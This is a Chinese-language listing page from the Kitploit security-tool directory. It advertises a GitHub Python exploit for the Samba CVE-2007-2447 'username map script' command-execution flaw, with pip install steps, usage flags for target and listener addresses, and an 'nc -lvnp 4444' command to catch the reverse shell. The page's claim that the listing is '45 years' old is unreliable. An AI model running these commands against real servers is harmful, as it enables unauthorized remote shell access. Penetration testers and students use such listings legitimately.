Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2007-2447 — 针对Samba CVE-2007-2447用户名映射脚本远程命令执行的Python漏洞利用,向可配置的远程监听器传递反向Shell载荷。 | Kitploit
工具/GitHubGitHub/0xkn/cve-2007-2447
漏洞分析漏洞利用Shellcode渗透测试命令与控制远程访问工具
GitHub0xkn/cve-2007-2447

CVE-2007-2447

针对Samba CVE-2007-2447用户名映射脚本远程命令执行的Python漏洞利用,向可配置的远程监听器传递反向Shell载荷。

查看仓库
45年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2007-2447 - username map script

"MS-RPC 功能在 Samba 3.0.0 到 3.0.25rc3 版本的 smbd 中,允许远程攻击者通过 shell 元字符执行任意命令,涉及 (1) SamrChangePassword 函数,当 smb.conf 选项 "username map script" 启用时;并允许远程认证用户通过其他 MS-RPC 函数中的 shell 元字符执行命令,涉及 (2) 远程打印机和 (3) 文件共享管理。"

Exploit

安装:

[*] 此漏洞利用需要 Python 3.7 或更高版本

root@kitploit:~
python3 -m pip install pysmb 

使用:

root@kitploit:~
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
  • --rhost -- 远程主机
  • --lhost -- 本地主机
  • --lport -- 本地端口
  • --rport -- 远程端口 [*] 可选。默认=445

不要忘记启动你的监听器:

root@kitploit:~
nc -lvnp 4444

PoC

image

下载工具